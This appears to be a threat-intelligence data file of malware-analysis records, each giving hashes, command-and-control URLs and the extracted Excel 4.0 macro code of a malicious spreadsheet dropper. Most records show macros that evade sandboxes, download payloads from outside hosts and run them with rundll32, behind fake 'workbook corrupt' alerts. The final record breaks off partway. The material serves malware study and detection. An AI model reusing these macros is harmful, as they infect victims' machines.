{"version":"0.2","sample":{"sample":"","kind":"file","target":"82daa3e246495d01b3d05ac7bca09ca3ba1c6bb604688722640f24360e09888d"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"82daa3e246495d01b3d05ac7bca09ca3ba1c6bb604688722640f24360e09888d","filesize":141824,"md5":"95e92f34c1a479e75723c233f5c928bf","sha1":"c2af01ed29c2d057f5c773f96f69a5864eff2b6c","sha256":"82daa3e246495d01b3d05ac7bca09ca3ba1c6bb604688722640f24360e09888d","sha512":"719483b80d9dfcf862ba662e539e7eb4c5ef89cc69ea26faee4711fee831fe310768f8f67abc27c368f76f92ca3703c6d7e1189c4988f3eedd1e5c941036581d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"82daa3e246495d01b3d05ac7bca09ca3ba1c6bb604688722640f24360e09888d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"lWwOHhy8Hu\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"82e208c78be01983ca713999320933ae93a45bf1463bb587c7e609ce04dac7c6"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"82e208c78be01983ca713999320933ae93a45bf1463bb587c7e609ce04dac7c6","filesize":206336,"md5":"16fc92ebe28a0068346ab27d0ae8d142","sha1":"a3f8c074d046ae280f1dd53e3a0b8d1b4acb625e","sha256":"82e208c78be01983ca713999320933ae93a45bf1463bb587c7e609ce04dac7c6","sha512":"cf83ad9386a84401ba6542d23b8fcfaecf3c85644453bd0ed860651304a56ce5780e870ecbff9f77201faa87df84f15d2a9a8f41eac40516ea90e007f0b797aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"82e208c78be01983ca713999320933ae93a45bf1463bb587c7e609ce04dac7c6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ryCO8XgWLO\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"82fbb6aa62a8e694e5a8986467f427968f60a2c34f318ebf6004aecf862fd0a3"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"82fbb6aa62a8e694e5a8986467f427968f60a2c34f318ebf6004aecf862fd0a3","filesize":141824,"md5":"a62ade8427dc72a50adfe4ea065815b2","sha1":"8d27ceee73e47eb1e4fadb181f61c3a5baf6cc4c","sha256":"82fbb6aa62a8e694e5a8986467f427968f60a2c34f318ebf6004aecf862fd0a3","sha512":"08c8a43b4f2241ddd34ed25569a62572b859fb0a94792d99a8c4131d6d1a0458fd84af625b4b9b023c834f2f080c07193c1188916f5d0182fcaae12090a1e617","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"82fbb6aa62a8e694e5a8986467f427968f60a2c34f318ebf6004aecf862fd0a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"kAiDcRNwVb\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"830a3c9fd71a335d79562c4c3b89a375e00320dbbc7938812001ca818a0c7be5"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"830a3c9fd71a335d79562c4c3b89a375e00320dbbc7938812001ca818a0c7be5","filesize":103941,"md5":"fd51b3376bc858da82a8226c6af67956","sha1":"0e502f82a5f495e7276a0ed44d8d6492e60e76ce","sha256":"830a3c9fd71a335d79562c4c3b89a375e00320dbbc7938812001ca818a0c7be5","sha512":"c54483ad0791caac19985edfcfde16c2321b055c92176736780f30e555c1cead3b20c892d11d8363015056b61d02e52ca914e52e25e029a79b3bc0b7d12e9730","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"830a3c9fd71a335d79562c4c3b89a375e00320dbbc7938812001ca818a0c7be5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"832e2934c7e9bac146ccca4a20ad3d2f2426319b352ea636e036b945b86062fc"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"832e2934c7e9bac146ccca4a20ad3d2f2426319b352ea636e036b945b86062fc","filesize":167936,"md5":"01e034f765bdd0ea57256e8dad2f92ab","sha1":"bc33380a6f4eb56e2e3c731207e27b0dd07f38f2","sha256":"832e2934c7e9bac146ccca4a20ad3d2f2426319b352ea636e036b945b86062fc","sha512":"268d4b61708b6cca2a99962886aa6da4b3b9ed8f424e4d6cfc1f6ddc9f9c4f76b95b9b9351d5d16846e0cdb4f52beae47765e748122733b2faa783ed99770929","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"832e2934c7e9bac146ccca4a20ad3d2f2426319b352ea636e036b945b86062fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"weZHiwRFRg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"834b7bbfc91e901c1e1df4fffe246eb1e03eebf79eeefa1d6811bca6e3b55039"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"834b7bbfc91e901c1e1df4fffe246eb1e03eebf79eeefa1d6811bca6e3b55039","filesize":209920,"md5":"836679d3954111ddd47da9fa30d5f25f","sha1":"2785c1493ecfa08f68e4eed9d5bca568ac9aeadc","sha256":"834b7bbfc91e901c1e1df4fffe246eb1e03eebf79eeefa1d6811bca6e3b55039","sha512":"dcfb1a90f59fdef7cee89161aba1a59a97eddad71f289e321784d604bf9c822c5c959c143911468bab8fe9ef2284abb716cd10f3d8e80fc1191515287a53bd1e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"834b7bbfc91e901c1e1df4fffe246eb1e03eebf79eeefa1d6811bca6e3b55039.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mggDgPJ3AS\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"838bcde9a1f3a170d9be205a947b2ab2c805b32ae930bcc12aff6c9a1c28a09b"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"838bcde9a1f3a170d9be205a947b2ab2c805b32ae930bcc12aff6c9a1c28a09b","filesize":160768,"md5":"ebce431a5a2c197b5ddd4118d0b87d7e","sha1":"d724559f4e1be192b8e60d1076ba6f00a76a7910","sha256":"838bcde9a1f3a170d9be205a947b2ab2c805b32ae930bcc12aff6c9a1c28a09b","sha512":"f867f84e9b4ad231d06fbf27b3c57d0c35be532d96b3a560c7cda0016171682ceed9e11b224f3aa37fb9d5d2827e90088ce459692008293389d4f8e0b1328518","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"838bcde9a1f3a170d9be205a947b2ab2c805b32ae930bcc12aff6c9a1c28a09b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AnkHSolnVV\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"839e91c33eba46f2baef6d976ee6a9561ce28ffcd7f13cad440558b34b2c051f"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"839e91c33eba46f2baef6d976ee6a9561ce28ffcd7f13cad440558b34b2c051f","filesize":167936,"md5":"d840eb3d573b6cd129a8bbada22b4d02","sha1":"6f754a37b39a8ca9a95c8ce71ec802b7aabfc237","sha256":"839e91c33eba46f2baef6d976ee6a9561ce28ffcd7f13cad440558b34b2c051f","sha512":"594e3050981833d85de841cb3dbcb9a4305c839a37df36f4679bcfc1ebd07bf6288935b98728cb41ddbc5cb76b5d91a8b3684e4c89b9fad820306d6ee10bcd7e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"839e91c33eba46f2baef6d976ee6a9561ce28ffcd7f13cad440558b34b2c051f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0NuuRyuUYW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"83bc6242d56c3f4d32b8daadf6dcc3c5046cf7f3425f6d247f4387e94d767cbd"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"83bc6242d56c3f4d32b8daadf6dcc3c5046cf7f3425f6d247f4387e94d767cbd","filesize":170496,"md5":"ef64fa57ca9bec60aa0b43109760777e","sha1":"03e87eca5cf7cef8ed1a727db4e8997aa795bdc8","sha256":"83bc6242d56c3f4d32b8daadf6dcc3c5046cf7f3425f6d247f4387e94d767cbd","sha512":"a23679362f41d3a460bc7042433e0e65d373351aabe049a9cd016689bf724e94a11a7362d111b825c3551834a5b28f5290dc4f5a3ba934e88074cb38f1a1c508","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"83bc6242d56c3f4d32b8daadf6dcc3c5046cf7f3425f6d247f4387e94d767cbd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NJJlnSeDJF\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"83c8954a67f99ff3104cb8f1e306e57594efd26e78835e37600c58ffc54bf59b"},"analysis":{"reported":"2020-04-09T16:17:23Z","score":10},"files":[{"filename":"83c8954a67f99ff3104cb8f1e306e57594efd26e78835e37600c58ffc54bf59b","filesize":185344,"md5":"3694a4014dc70fb8c3125fb43a9776b0","sha1":"94f1d5c796d85fd87c43d8413bb9bc5b1992f05a","sha256":"83c8954a67f99ff3104cb8f1e306e57594efd26e78835e37600c58ffc54bf59b","sha512":"8f6f4bdbdbf2ba341de1ef7e0d893d6e4ad6a68c561abaf9954632ffa9786133a98c5a048b5aed816001cecd3428d7306d96c1a96728ab6d151b8d8b0aece8ca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"83c8954a67f99ff3104cb8f1e306e57594efd26e78835e37600c58ffc54bf59b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"83e0717562f8bba1afd077f241ca2e9a29072b6379f868bb5275b168d188c494"},"analysis":{"reported":"2020-04-09T16:17:23Z","score":10},"files":[{"filename":"83e0717562f8bba1afd077f241ca2e9a29072b6379f868bb5275b168d188c494","filesize":185344,"md5":"8ad8093e5d60700ae99cf5d632e93dd7","sha1":"20712692674c6a743fd9b99f552fc95ce962fb9b","sha256":"83e0717562f8bba1afd077f241ca2e9a29072b6379f868bb5275b168d188c494","sha512":"85372901599185100b4f3e773eb3ab7d1306eef953c2f4167a194d271b62d3f9d7903e9607c049a38c924eacfd2f4e182831f1cff9a3be72cbef76af9a19fe6e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"83e0717562f8bba1afd077f241ca2e9a29072b6379f868bb5275b168d188c494.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"83f38fce5e0bf1cd45846aa74ed4a4ac6ad2194b937ef278ba460f05b4d3003f"},"analysis":{"reported":"2020-04-09T16:17:23Z","score":10},"files":[{"filename":"83f38fce5e0bf1cd45846aa74ed4a4ac6ad2194b937ef278ba460f05b4d3003f","filesize":113664,"md5":"294f405f17fa0b251354f2e87d9b9903","sha1":"ec0ad9a1b080be2fdd7bdbead1efe3dbb3ad034a","sha256":"83f38fce5e0bf1cd45846aa74ed4a4ac6ad2194b937ef278ba460f05b4d3003f","sha512":"f80847962115bab432b92a0a222dd1b6268d012e92cc79efbbd06ced590778232d5a9408309cc9075055575920b38f6ea1b1900d87a72ab01c624c746d931afe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"83f38fce5e0bf1cd45846aa74ed4a4ac6ad2194b937ef278ba460f05b4d3003f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"XGGXNmdzgt\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"83f8ac281c7c4d5de5cc768c7304f329d4ada035e948e7b0ccedc9eb6bceadd6"},"analysis":{"reported":"2020-04-09T16:17:23Z","score":10},"files":[{"filename":"83f8ac281c7c4d5de5cc768c7304f329d4ada035e948e7b0ccedc9eb6bceadd6","filesize":167936,"md5":"c2e98c793e0a6778b06c8bb45e677483","sha1":"e3f4020f3a3276b4114964ffb2e88bbc00eceba0","sha256":"83f8ac281c7c4d5de5cc768c7304f329d4ada035e948e7b0ccedc9eb6bceadd6","sha512":"925c356e541016df9ea826a54d99777ec40d7ed14693abb6a2c1b492a07933072d03af38a066b26668afceacfcf9f11a81a4d1984191c3af34c9e8cd9783ab60","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"83f8ac281c7c4d5de5cc768c7304f329d4ada035e948e7b0ccedc9eb6bceadd6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M7OaeeVLMZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"841505c775e90f73926e3d68520447b3c0a9da71c4ffc0f1486a4f383f8d35eb"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"841505c775e90f73926e3d68520447b3c0a9da71c4ffc0f1486a4f383f8d35eb","filesize":212992,"md5":"0f99e3aa18eb4424fb4b785c0538477c","sha1":"5bf8621dd6ec9196a9f093cadcb99c31a3bc80cf","sha256":"841505c775e90f73926e3d68520447b3c0a9da71c4ffc0f1486a4f383f8d35eb","sha512":"ce9d2983a035fc4a9fbf98ac65a065f1327e24d2e3aa2edea3f5ef391c157a9233d9a3f6d3ff35a9f66df65da3bda467ebcc085ce5714f8cb76bce46fb2e0091","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"841505c775e90f73926e3d68520447b3c0a9da71c4ffc0f1486a4f383f8d35eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Gk2QhpPYcA\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"842c971a6af8a631e93387786e8beac488a56a8d58b3292ca7dd0b6bee5f0aef"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"842c971a6af8a631e93387786e8beac488a56a8d58b3292ca7dd0b6bee5f0aef","filesize":225280,"md5":"3b39acd7ae1891a200cbd3aec632fc36","sha1":"0d0e5411971e45258268bdbd42d007c623cf06d1","sha256":"842c971a6af8a631e93387786e8beac488a56a8d58b3292ca7dd0b6bee5f0aef","sha512":"e58948bdbaabfb040682cb33df9caba36f558effa02d07c3dc64f19394896b3b543b714bb4ad0ff26ca165a9f3dee301ade0f1e3b9ba296fa0dc692cc93f35e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"842c971a6af8a631e93387786e8beac488a56a8d58b3292ca7dd0b6bee5f0aef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 